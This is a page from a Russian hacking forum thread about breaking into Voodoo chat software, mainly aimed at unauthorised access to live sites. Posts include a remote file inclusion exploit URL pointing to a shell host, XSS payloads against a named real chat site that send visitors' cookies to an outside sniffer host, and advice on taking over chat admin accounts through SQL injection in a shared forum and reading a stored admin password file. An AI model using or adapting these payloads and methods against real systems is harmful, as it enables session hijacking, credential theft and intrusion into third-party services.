ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
Перезагрузить страницу Voodoo чаты
   
Ответ
Страница 23 из 26 « Первая < 13 19 20 21 22 23 24 25 26 >
 
Опции темы Поиск в этой теме Опции просмотра

  #221  
Старый 01.02.2008, 05:42
SEVKA
Новичок
Регистрация: 14.03.2005
Сообщений: 13
Провел на форуме:
15240

Репутация: 0
По умолчанию
Народ , видал я вот такую багу в Voodoo :

Bug in : index.php
#
#Vlu Code :
#--------------------------------
#//here it can fails, i don't care. will be used default system language
#
# else
include_once($file_path."languages/".$language.".php");
#
#
include($file_path."designes/".$design."/index.php");
#?>
#================================================= ================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script
Path]/index.php?file_path=http://SHELLURL.COM?

только чего-то не выходит . пишет 404 ошибку . Так подскажите то ли я чего не так делаю , то ли пропачена уязвимость датирована она 2006-08-02 . Помогите разобраться
 
Ответить с цитированием

  #222  
Старый 01.02.2008, 12:49
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию
Патченная скорее всего версия...или просто другая версия)
 
Ответить с цитированием

  #223  
Старый 03.02.2008, 13:28
SEVKA
Новичок
Регистрация: 14.03.2005
Сообщений: 13
Провел на форуме:
15240

Репутация: 0
По умолчанию
А может быть я чего-то недопонимаю , тогда те кто уже юзали сей эксплойт ... объясните на пальцах плиз ...
 
Ответить с цитированием

  #224  
Старый 20.02.2008, 01:04
schut123
Участник форума
Регистрация: 02.01.2007
Сообщений: 202
Провел на форуме:
868377

Репутация: 99
По умолчанию
Народ, помогите пожалуйста с http://chat.gtn.ru
там есть
Код:
http://chat.gtn.ru/go.php?url=javascript:alert(/document.cookie/)
формирую запрос:
Код:
http://chat.gtn.ru/go.php?url=javascript:img%20=%20new%20Image();%20img.src%20=%20"http://s.netsec.ru/schut123.gif?"+document.cookie
но на сниф ничего не приходит.
так-же там есть
Код:
http://chat.gtn.ru//password_reminder.php?look_for=%3Cscript%3Ealert(document.cookie);%3C/script%3E>
формирую запрос:
Код:
 http://chat.gtn.ru//password_reminder.php?look_for="><script>img%20=%20new%20Image();%20img.src%20=%20"http://s.netsec.ru/schut123.gif?"+document.cookie;</script>
На снифере никакого эффекта. Пусто.

Подскажите, как быть.. Возможно я неправильно запрос составляю. Или что-то еще..
 
Ответить с цитированием

  #225  
Старый 20.02.2008, 13:06
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию
schut123 ты куки не поимешь..ибо в вуду там сессия идёт.......вообщем хсс не катит......
 
Ответить с цитированием

  #226  
Старый 20.02.2008, 14:28
schut123
Участник форума
Регистрация: 02.01.2007
Сообщений: 202
Провел на форуме:
868377

Репутация: 99
По умолчанию
А как тогда можно админку получить? Насколько я понимаю сули там тоже нет...
Помогите найти уязвимости в этом чате, которыми можно реально воспользоваться.
 
Ответить с цитированием

  #227  
Старый 20.02.2008, 14:58
_Sniper_
Banned
Регистрация: 21.07.2007
Сообщений: 504
Провел на форуме:
1899369

Репутация: 445


Отправить сообщение для _Sniper_ с помощью ICQ
По умолчанию
Цитата:
Сообщение от schut123  
А как тогда можно админку получить? Насколько я понимаю сули там тоже нет...
Помогите найти уязвимости в этом чате, которыми можно реально воспользоваться.
Раньше спичкой разрывал чаты такие. Пихаеш спичку в ENTER и ждёш..
 
Ответить с цитированием

  #228  
Старый 21.02.2008, 01:46
schut123
Участник форума
Регистрация: 02.01.2007
Сообщений: 202
Провел на форуме:
868377

Репутация: 99
По умолчанию
Ну а по делу кто-нибудь скажет что-нибудь?
 
Ответить с цитированием

  #229  
Старый 19.04.2008, 20:57
goodkit
Участник форума
Регистрация: 19.05.2006
Сообщений: 181
Провел на форуме:
1180139

Репутация: 78
По умолчанию
По делу нет, а вот что бы такой чат похекать, надо хекать форум, канечно если такой есть, на том же сайте что и чат, БД одна на всех, мне это как то давно подсказали, и именно тогда получилось достать логины и пассы от админок в чате, а форум полет от sql inj.
 
Ответить с цитированием

  #230  
Старый 17.05.2008, 14:15
Neorin
Познающий
Регистрация: 30.04.2007
Сообщений: 67
Провел на форуме:
287714

Репутация: 40
По умолчанию
дело говоришь..не только дело не в бд......самый простой спрособ взломать вуду енто найти на бажный форум, или стартовую(обычно стоят дефаил) потом лезишь сюды
/home/****/public_html/chat/admin/admin_users.php а там проль в админку лежит в каком виде ,
<?php $admin_users[0]["nickname"] = "***"; $admin_users[0]["password"] = "****"; ?>

самый простой способ!)
 
Ответить с цитированием
Ответ
Страница 23 из 26 « Первая < 13 19 20 21 22 23 24 25 26 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
voodoo уязвимость при банне JRX Чаты 6 19.11.2006 01:42
Привет парни помогите с Voodoo чат chat.tus.ru Spider_Klim Чаты 3 27.07.2006 09:48
Чаты августа ломаются ? SEVKA Чаты 123 25.05.2006 10:50
Voodoo chat Guest Чаты 8 08.07.2005 12:01
VooDoo чаты Spectrum Чаты 6 16.05.2005 20:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ